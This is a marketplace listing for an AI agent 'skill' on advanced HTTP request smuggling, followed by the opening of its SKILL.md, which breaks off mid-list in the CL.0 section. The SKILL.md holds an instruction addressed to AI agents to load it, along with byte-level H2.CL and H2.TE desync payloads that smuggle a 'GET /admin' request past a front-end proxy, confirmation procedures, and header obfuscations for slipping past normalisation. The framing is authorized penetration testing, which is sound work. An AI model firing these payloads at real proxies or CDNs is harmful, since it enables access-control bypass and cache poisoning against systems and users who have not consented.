Request Smuggling
Craft HTTP/2 and advanced desync smuggling payloads when auditing reverse proxies, CDNs, and dual-stack front/back-end HTTP parsers.
Overview
Request Smuggling (advanced variants) is an agent skill for the Ship phase that documents HTTP/2 and advanced desync smuggling payloads for authorized security testing of proxies and origins.
Install
npx skills add https://github.com/yaklang/hack-skills --skill request-smugglingWhat is this skill?
- H2.CL and H2.TE byte-level desync flows with front-end H2 to back-end H1 downgrade
- CL.0 desync, Fat GET smuggling, and smuggling-to-cache-poisoning chains
- Client-side desync (CSD) and CDN/reverse-proxy behavior matrices
- Assumes base CL.TE / TE.CL / TE.TE fundamentals from the parent request-smuggling SKILL.md
- Structured attack-flow diagrams for content-length vs frame-boundary disagreements
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You know classic TE/CL smuggling but lack byte-accurate H2.CL, Fat GET, and cache-poisoning chain recipes for your specific CDN and downgrade topology.
Who is it for?
Builders or consultants running structured offensive tests on API gateways, CDNs, and split H2/H1 stacks after fundamentals are loaded.
Skip if: Casual installs on production without authorization, beginners learning HTTP basics, or teams that only need dependency scanning without manual protocol abuse.
When should I use this skill?
Load when you need H2.CL/H2.TE byte-level payloads, CL.0 desync, Fat GET smuggling, smuggling→cache poisoning chains, client-side desync flows, or CDN/reverse-proxy behavior matrices after the main SKILL.md fundamentals
What do I get? / Deliverables
You leave with concrete H2 and desync payload shapes and behavior matrices to reproduce queueing bugs and validate fixes on permitted targets.
- Reproducible smuggling payload templates
- Documented desync hypotheses for proxy/downgrade paths
Recommended Skills
Journey fit
Canonical shelf is Ship → security because smuggling is exercised during pre-release offensive testing and hardening of edge and origin stacks. Security subphase covers vulnerability research and exploit-path validation before production exposure.
How it compares
Specialized offensive protocol playbook—not a generic OWASP checklist skill or an automated DAST integration.
Common Questions / FAQ
Who is request-smuggling (advanced variants) for?
Security-minded solo builders and indie pentesters auditing reverse proxies and APIs who already use the main yaklang request-smuggling SKILL.md for CL.TE fundamentals.
When should I use request-smuggling (advanced variants)?
During Ship security reviews when you need H2.CL/H2.TE payloads, CL.0 or Fat GET smuggling, smuggling-to-cache-poisoning chains, or CDN behavior matrices on a scoped test environment.
Is request-smuggling (advanced variants) safe to install?
The skill content is dual-use offensive knowledge; review the Security Audits panel on this Prism page and only run techniques on systems you are explicitly allowed to test.
SKILL.md
READMESKILL.md - Request Smuggling
# HTTP/2 Smuggling Variants & Advanced Desync Techniques > **AI LOAD INSTRUCTION**: Load this when you need H2.CL/H2.TE byte-level payloads, CL.0 desync, Fat GET smuggling, smuggling→cache poisoning chains, client-side desync (CSD) flows, or CDN/reverse-proxy behavior matrices. Assumes the main [SKILL.md](./SKILL.md) is already loaded for CL.TE, TE.CL, TE.TE fundamentals. --- ## 1. H2.CL — HTTP/2 Content-Length Desync ### 1.1 Concept The front-end speaks HTTP/2 with the client and downgrades to HTTP/1.1 toward the back-end. HTTP/2 frames have their own length field (frame length), but the proxy may also forward a `content-length` header to the back-end. If these disagree, the back-end trusts `content-length` while the front-end trusts the H2 frame boundary. ### 1.2 Attack Flow ``` Client ──[HTTP/2]──> Front-end proxy ──[HTTP/1.1]──> Back-end 1. Client sends H2 POST with: - H2 DATA frame containing: "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: target\r\n\r\n" - content-length header: 0 2. Front-end (H2): reads entire DATA frame as body of first request → forwards to back-end as HTTP/1.1 POST 3. Back-end (H1): sees content-length: 0 → treats body as empty → remaining bytes become: "GET /admin HTTP/1.1\r\nHost: target\r\n\r\n" → parsed as second request ``` ### 1.3 Byte-Level Payload ```http :method: POST :path: / :authority: target.example content-type: application/x-www-form-urlencoded content-length: 0 GET /admin HTTP/1.1 Host: target.example ``` The H2 DATA frame carries the entire body including the smuggled `GET /admin` request. The `content-length: 0` header tells the back-end the POST body is empty. ### 1.4 Confirming H2.CL ``` Step 1: Send H2 POST with content-length: 0 and smuggled prefix "G" Step 2: Follow immediately with normal GET / on same connection Step 3: If back-end sees "GGET / HTTP/1.1" → 405 or error → confirmed Timing version: - Smuggle "GET /sleep?delay=10 HTTP/1.1..." - Subsequent request on same connection delayed → confirmed ``` --- ## 2. H2.TE — HTTP/2 Transfer-Encoding Desync ### 2.1 Concept HTTP/2 specification forbids `transfer-encoding` in H2 frames. However, some front-end proxies don't strip it when downgrading to H1. If the back-end sees `transfer-encoding: chunked` in the downgraded H1 request, it uses chunked parsing while the front-end used H2 frame boundaries. ### 2.2 Attack Flow ``` Client ──[HTTP/2]──> Front-end proxy ──[HTTP/1.1]──> Back-end 1. Client sends H2 POST with: - transfer-encoding: chunked (forbidden in H2, but proxy passes it through) - H2 DATA frame body: "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: target\r\n\r\n" 2. Front-end: ignores transfer-encoding (H2 doesn't use it) → forwards entire DATA frame as H1 body 3. Back-end: sees transfer-encoding: chunked → parses "0\r\n\r\n" as end-of-chunks → remaining bytes = smuggled request ``` ### 2.3 Byte-Level Payload ```http :method: POST :path: / :authority: target.example content-type: application/x-www-form-urlencoded transfer-encoding: chunked 0 GET /admin HTTP/1.1 Host: target.example ``` ### 2.4 Variations Some proxies normalize the `transfer-encoding` header. Try obfuscations: ```http transfer-encoding: chunked Transfer-Encoding: chunked (capitalized — H2 requires lowercase) transfer-encoding: identity (should be stripped but may pass) transfer-encoding: chunked (extra space) transfer-encoding: chunked\r\n (trailing whitespace) ``` --- ## 3. CL.0 — CONNECTION CLOSE DESYNC ### 3.1 Concept CL.0 occurs when the back-end ignores the `content-length` header entirely and reads the body length as 0 — regardless of what `content-length` says. The remaining body bytes stay in the socket buffer for the next request. Unlike CL.TE or TE.CL, CL.0 does NOT require `transfer-encoding`. It exploits endpoints that simply don't consume the body. ### 3.2 Vulnerable Conditions - Endpoints that return a response before reading the full body (e.g., redirects, 301/302)